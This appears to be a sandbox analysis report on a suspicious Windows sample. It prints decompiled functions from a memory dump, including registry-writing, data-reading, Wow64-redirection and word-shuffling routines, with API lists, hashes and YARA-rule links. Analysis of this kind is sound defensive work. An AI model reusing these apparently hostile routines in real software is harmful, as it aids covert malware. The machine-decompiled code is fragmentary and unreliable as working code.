Opcode ID: 9d4b840aece02696d4ae6f5492a3455082e5876ac1f62b813e2bc6b2c19f59f4
Instruction ID: 1d7a7d0d23c2c282ccbf0f92a50b766f5da6b0ba9896dcd119353732e1bf062f
Opcode Fuzzy Hash: 9d4b840aece02696d4ae6f5492a3455082e5876ac1f62b813e2bc6b2c19f59f4
Instruction Fuzzy Hash: 4101F932918B119EFB1045F45C59AE6276AFB0E67C730032AF630415D4EF514A89B150

Uniqueness

Uniqueness Score: -1.00%

Function 00E81D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E81D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xe8a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00E84AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00E87702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00E850CA(_a8);
						goto L29;
					}
					_t64 =  *0xe8a2cc; // 0x5499c98
					_t16 = _t64 + 0xc; // 0x5499d8c
					_t65 = E00E84AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00e890
						if(E00E85F2A(_t97,  *_t33, _t91, _a8,  *0xe8a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0xe8a2d4; // 0x460d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xe8b9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xe8b9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E00E85927(_t69,  *0xe8a384,  *0xe8a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xe8a2d4; // 0x460d5a8
									_t44 = _t71 + 0xe8b86a; // 0x74666f53
									_t73 = E00E84AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00e890
										E00E81F7A( *_t47, _t91, _a8,  *0xe8a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d00e890
										E00E81F7A( *_t49, _t91, _t99,  *0xe8a380, _a16);
										E00E850CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00e890
									E00E81F7A( *_t40, _t91, _a8,  *0xe8a388, _a24);
									_t43 = _t101 + 0x10; // 0x3d00e890
									E00E81F7A( *_t43, _t91, _a8,  *0xe8a380, _a16);
								}
								if( *_t101 != 0) {
									E00E850CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00e890
					_t81 = E00E86A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00e890
							E00E85F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00E850CA(_t100);
						_t98 = _a16;
					}
					E00E850CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00E877A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xe8a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x00e81d57
0x00e81d60
0x00e81d67
0x00e81d6c
0x00e81dd9
0x00e81ddf
0x00e81de4
0x00e81deb
0x00e81df2
0x00e81df5
0x00e81f60
0x00e81f67
0x00e81f67
0x00e81f6c
0x00e81f6e
0x00e81f6e
0x00e81f77
0x00e81f77
0x00e81dfb
0x00e81e07
0x00e81f56
0x00e81f59
0x00000000
0x00e81f59
0x00e81e0d
0x00e81e12
0x00e81e15
0x00e81e1c
0x00e81e1f
0x00e81e68
0x00e81e68
0x00e81e7b
0x00e81e85
0x00e81e8d
0x00e81e92
0x00e81e9c
0x00e81e9c
0x00e81e94
0x00e81e94
0x00e81e94
0x00e81e94
0x00e81ebe
0x00e81ec6
0x00e81ef4
0x00e81ef9
0x00e81f00
0x00e81f05
0x00e81f09
0x00e81f3b
0x00e81f0b
0x00e81f18
0x00e81f1b
0x00e81f2b
0x00e81f2e
0x00e81f34
0x00e81f34
0x00e81ec8
0x00e81ed5
0x00e81ed8
0x00e81eea
0x00e81eed
0x00e81eed
0x00e81f45
0x00e81f51
0x00e81f47
0x00e81f4a
0x00e81f4a
0x00e81f45
0x00e81ebe
0x00000000
0x00e81e85
0x00e81e2e
0x00e81e31
0x00e81e38
0x00e81e3e
0x00e81e41
0x00e81e43
0x00e81e4f
0x00e81e52
0x00e81e52
0x00e81e58
0x00e81e5d
0x00e81e5d
0x00e81e63
0x00000000
0x00e81e63
0x00e81d71
0x00000000
0x00e81d98
0x00e81d98
0x00e81da4
0x00e81db7
0x00e81dbd
0x00e81dc5
0x00000000
0x00e81dc5

APIs

StrChrA.SHLWAPI(00E830C2,0000005F,00000000,00000000,00000104), ref: 00E81D8A
lstrcpy.KERNEL32(?,?), ref: 00E81DB7

Part of subcall function 00E84AA6: lstrlen.KERNEL32(?,00000000,05499C98,7742C740,00E813D0,05499E9D,00E855DE,00E855DE,?,00E855DE,?,63699BC3,E8FA7DD7,00000000), ref: 00E84AAD
Part of subcall function 00E84AA6: mbstowcs.NTDLL ref: 00E84AD6
Part of subcall function 00E84AA6: memset.NTDLL ref: 00E84AE8

Part of subcall function 00E81F7A: lstrlenW.KERNEL32(?,?,?,00E81F20,3D00E890,80000002,00E830C2,00E84106,74666F53,4D4C4B48,00E84106,?,3D00E890,80000002,00E830C2,?), ref: 00E81F9F

Part of subcall function 00E850CA: RtlFreeHeap.NTDLL(00000000,00000000,00E84239,00000000,00000001,?,00000000,?,?,?,00E86B8D,00000000,?,00000001), ref: 00E850D6

lstrcpy.KERNEL32(?,00000000), ref: 00E81DD9

Strings

\, xrefs: 00E81DBD
(, xrefs: 00E81E3A

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: c2a1e8f59d7604b6a3e96c006a00a7c9e3750bc8ca2a7554261733b2e5d13070
Instruction ID: b6242896999389dbdacae81c42a2bf26e8e4b52caadb7cc33afa8f492e26f92a
Opcode Fuzzy Hash: c2a1e8f59d7604b6a3e96c006a00a7c9e3750bc8ca2a7554261733b2e5d13070
Instruction Fuzzy Hash: 4E51587220020AAFDF21AFA1DC41EAA37BDFF14354F1494A5FA1DB2161D735D926AB10

Uniqueness

Uniqueness Score: -1.00%

Function 00E814A8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00E814A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0xe8a144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E00E86837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xe8a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00E850CA(_v20);
											if(_v8 == 0) {
												_v8 = E00E837FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00E825C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x00e814a9
0x00e814af
0x00e814ba
0x00e814ba
0x00e814bc
0x00e85aff
0x00e85b02
0x00e85b0b
0x00e85b0e
0x00e85b11
0x00e85b19
0x00e85c17
0x00e85c22
0x00e85c25
0x00e85c27
0x00000000
0x00e85c27
0x00e85b1f
0x00e85b22
0x00e85c2a
0x00e85c2a
0x00e85b28
0x00e85b2b
0x00e85b2c
0x00e85b2e
0x00e85b37
0x00e85c0e
0x00e85b3d
0x00e85b43
0x00e85b4a
0x00e85b4d
0x00e85bfc
0x00e85b53
0x00000000
0x00e85b53
0x00e85b53
0x00e85b53
0x00e85b53
0x00e85b58
0x00e85b5a
0x00e85b5a
0x00e85b67
0x00e85b6f
0x00000000
0x00000000
0x00e85b71
0x00e85b7e
0x00e85b84
0x00e85b84
0x00e85b87
0x00000000
0x00000000
0x00e85b89
0x00e85b94
0x00e85ba8
0x00e85bde
0x00e85baa
0x00e85baa
0x00e85bb1
0x00e85bb9
0x00000000
0x00e85bbb
0x00e85bbb
0x00e85bc6
0x00e85bc9
0x00e85bd0
0x00000000
0x00e85bd0
0x00e85bc9
0x00e85bb9
0x00e85be1
0x00e85be4
0x00e85bec
0x00e85bf7
0x00e85bf7
0x00000000
0x00e85bec
0x00e85b91
0x00000000
0x00e85bd3
0x00e85bd3
0x00000000
0x00e85bdc
0x00e85c03
0x00e85c03
0x00e85c09
0x00e85c09
0x00e85b37
0x00e85b22
0x00e85c34
0x00e814b1
0x00e814b1
0x00e814b8
0x00e814c3
0x00000000
0x00000000
0x00000000
0x00e814b8

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00E87134,00000000,?), ref: 00E85B9B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00E87134,00000000,?,?), ref: 00E85BBB

Part of subcall function 00E825C7: wcstombs.NTDLL ref: 00E82687

Strings

5}, xrefs: 00E85B2F

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID: 5}
API String ID: 2344289193-1116033649
Opcode ID: f0e975da9f9780716d61a544cd81f5fa1da543bcca1ad8661642581f9b9b9066
Instruction ID: 93d9dc998a341280708e2e116a84729816a9840cd907aee68cc5803192cbcfdd
Opcode Fuzzy Hash: f0e975da9f9780716d61a544cd81f5fa1da543bcca1ad8661642581f9b9b9066
Instruction Fuzzy Hash: 9E413BB2D00609EFDF10AFA5C9849EEBBB8EB14344F2454AAE40EF7150EB709E44DB11

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E41AA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6E1E41CE
DName::DName.LIBVCRUNTIME ref: 6E1E41F2

Strings

A, xrefs: 6E1E424D

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: ece5ec2f0c168ecf9f6dbddc1a7bc5bbb7d48131baad19b0d02045314394d4da
Instruction ID: 9a9e7d0d96b9b98f282b6b3d99ce21584d431bb31bbb8c13abfb4cf7588d129e
Opcode Fuzzy Hash: ece5ec2f0c168ecf9f6dbddc1a7bc5bbb7d48131baad19b0d02045314394d4da
Instruction Fuzzy Hash: C631DF70A04A099FDF14CFE8D805ADDBBB9BF16300F01405EF4519BA40CBB49D86EB15

Uniqueness

Uniqueness Score: -1.00%

Function 00E86BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00E86BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00E82902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xe8a2d4; // 0x460d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xe8b4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xe8b8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xe8a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00e86be1
0x00e86be8
0x00e86bec
0x00e86bf1
0x00e86bf8
0x00e86bfb
0x00e86c05
0x00e86c0a
0x00e86c16
0x00e86c1d
0x00e86c27
0x00e86c27
0x00e86c1f
0x00e86c1f
0x00e86c1f
0x00e86c1f
0x00e86c2d
0x00e86c30
0x00e86c38
0x00e86c3b
0x00e86c3e
0x00e86c41
0x00e86c46
0x00e86c4f
0x00e86c5c
0x00e86c51
0x00e86c57
0x00e86c57
0x00e86c62
0x00e86c62
0x00e86c6a

APIs

Part of subcall function 00E82902: SysAllocString.OLEAUT32(?), ref: 00E8295E
Part of subcall function 00E82902: SysAllocString.OLEAUT32(0070006F), ref: 00E82972
Part of subcall function 00E82902: SysAllocString.OLEAUT32(00000000), ref: 00E82984
Part of subcall function 00E82902: SysFreeString.OLEAUT32(00000000), ref: 00E829E8

memset.NTDLL ref: 00E86C05
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00E86C41
GetLastError.KERNEL32 ref: 00E86C51
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00E86C62

Strings

<, xrefs: 00E86C16

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: f0d13b530b01a6204e911d2115f0b1014f46554e9283a7478b8644ac3641e9d8
Instruction ID: 77657eca935738b521d43bf54af1168f5a13fc64cb5557ffaf652a7475d47dad
Opcode Fuzzy Hash: f0d13b530b01a6204e911d2115f0b1014f46554e9283a7478b8644ac3641e9d8
Instruction Fuzzy Hash: 10113C71900218AFDB00EFA5DC89BD9BBF8EB08794F04801AF90DF7251D7749544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E201AA3, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E201B25
_free.LIBCMT ref: 6E201B49
_free.LIBCMT ref: 6E201CD6
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E194D40), ref: 6E201CE8
_free.LIBCMT ref: 6E201EA2

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 1a5ee10c3c3e1031db4ad8f0be504d2d40a6182ca52a9f0fbba4b67c80006791
Instruction ID: d47949da34991abae25307b87d3870396d05a733efbdab4109cba0bc31238cfc
Opcode Fuzzy Hash: 1a5ee10c3c3e1031db4ad8f0be504d2d40a6182ca52a9f0fbba4b67c80006791
Instruction Fuzzy Hash: 41C11675A0411EDBDB10CFE8C850AEE7BFFAF46319F14495AD591972C0E7318A8ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E82A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00E82A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00E86837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00E850CA(_v16);
								goto L37;
							}
							_t103 = E00E86837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xe8a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x00e82a2a
0x00e82a31
0x00e82a36
0x00e82a39
0x00e82a40
0x00e82a43
0x00e82a46
0x00e82a4d
0x00e82a50
0x00e82ba4
0x00e82ba6
0x00e82ba8
0x00e82bad
0x00e82bad
0x00e82a56
0x00e82a59
0x00e82a5c
0x00e82a5e
0x00e82a5e
0x00e82a62
0x00000000
0x00000000
0x00e82a66
0x00e82a92
0x00e82a97
0x00e82a99
0x00e82a99
0x00e82a9c
0x00e82a9f
0x00e82a9f
0x00e82aa1
0x00000000
0x00e82a6c
0x00e82a6e
0x00e82a8d
0x00e82a8d
0x00e82aa4
0x00e82aa4
0x00e82aa5
0x00e82aa5
0x00e82aa8
0x00000000
0x00000000
0x00000000
0x00e82aa8
0x00e82a72
0x00e82ab9
0x00e82abd
0x00e82b97
0x00e82b99
0x00e82b99
0x00e82b9a
0x00e82b9d
0x00000000
0x00e82b9d
0x00e82ad7
0x00e82adb
0x00e82b93
0x00000000
0x00e82b93
0x00e82ae1
0x00e82ae4
0x00e82ae8
0x00e82aee
0x00e82af1
0x00e82b89
0x00e82b89
0x00000000
0x00e82b8f
0x00e82afc
0x00e82b05
0x00e82b19
0x00e82b20
0x00e82b35
0x00e82b3b
0x00e82b43
0x00000000
0x00000000
0x00000000
0x00000000
0x00e82b45
0x00e82b45
0x00e82b45
0x00e82b4c
0x00e82b54
0x00000000
0x00000000
0x00e82b56
0x00e82b5f
0x00000000
0x00000000
0x00000000
0x00e82b61
0x00e82b63
0x00e82b66
0x00e82b66
0x00e82b69
0x00e82b6d
0x00e82b70
0x00e82b76
0x00e82b79
0x00e82b80
0x00000000
0x00e82afc
0x00e82a77
0x00e82a82
0x00e82a85
0x00e82a87
0x00e82a87
0x00e82a8a
0x00e82a8c
0x00000000
0x00e82a8c
0x00e82a66
0x00e82aac
0x00e82ab1
0x00e82ab3
0x00e82ab3
0x00e82ab6
0x00e82ab6
0x00000000

APIs

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

lstrcpy.KERNEL32(63699BC4,00000020), ref: 00E82B20
lstrcat.KERNEL32(63699BC4,00000020), ref: 00E82B35
lstrcmp.KERNEL32(00000000,63699BC4), ref: 00E82B4C
lstrlen.KERNEL32(63699BC4), ref: 00E82B70

Strings

, xrefs: 00E82AB9

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: b1288403ed0298d57b8788d07d5edd012cf9151bd43121f51f7201df49e87c6b
Instruction ID: 94d170ae927bee7c7619bef0b3d00ef2b7bfbbc27630ad74b9b0ec8c3ce80f67
Opcode Fuzzy Hash: b1288403ed0298d57b8788d07d5edd012cf9151bd43121f51f7201df49e87c6b
Instruction Fuzzy Hash: 7151B431900108EFDF25EF99C9846EDBBB5FF45354F15909AEA1DBB211C7709A41DB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E2097A8, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E2097C0

Part of subcall function 6E1FD7F5: HeapFree.KERNEL32(00000000,00000000,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?), ref: 6E1FD80B
Part of subcall function 6E1FD7F5: GetLastError.KERNEL32(?,?,6E209A83,?,00000000,?,?,?,6E209D87,?,00000007,?,?,6E207DFF,?,?), ref: 6E1FD81D

_free.LIBCMT ref: 6E2097D2
_free.LIBCMT ref: 6E2097E4
_free.LIBCMT ref: 6E2097F6
_free.LIBCMT ref: 6E209808

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 38b3a0c68b83af7d4c60856a542d4275541f37c664b34fce40e1dd20ff4cf562
Instruction ID: f96d496cd768f506663559e6e29d70472a57450e511bf5f7f884ae73dab55d72
Opcode Fuzzy Hash: 38b3a0c68b83af7d4c60856a542d4275541f37c664b34fce40e1dd20ff4cf562
Instruction Fuzzy Hash: 3DF04F7290460EDB8A62DA98D4D6D9B33FFAA857157600D45E019DBA84CF20F8838AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00E84C1B, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E84C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xe8a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xe8a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xe8a2b0 = _t6;
				 *0xe8a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xe8a2ac = _t7;
				if(_t7 == 0) {
					 *0xe8a2ac =  *0xe8a2ac | 0xffffffff;
				}
				return 0;
			}

0x00e84c23
0x00e84c2b
0x00e84c30
0x00000000
0x00e84c7d
0x00e84c32
0x00e84c3a
0x00e84c7a
0x00000000
0x00e84c7a
0x00e84c3c
0x00e84c41
0x00e84c53
0x00e84c58
0x00e84c5e
0x00e84c66
0x00e84c6b
0x00e84c6d
0x00e84c6d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00E86B4E,?,?,00000001), ref: 00E84C23
GetVersion.KERNEL32(?,00000001), ref: 00E84C32
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00E84C41
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00E84C5E
GetLastError.KERNEL32(?,00000001), ref: 00E84C7D

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 3ae36a122dc4b037d51bd6d1c2e2ddf645756c5eebcd0257167512c389d4b885
Instruction ID: bf0fa9297879954341c0c4dfe661d306f42bd711a8ed4674efbf3d450a93ee38
Opcode Fuzzy Hash: 3ae36a122dc4b037d51bd6d1c2e2ddf645756c5eebcd0257167512c389d4b885
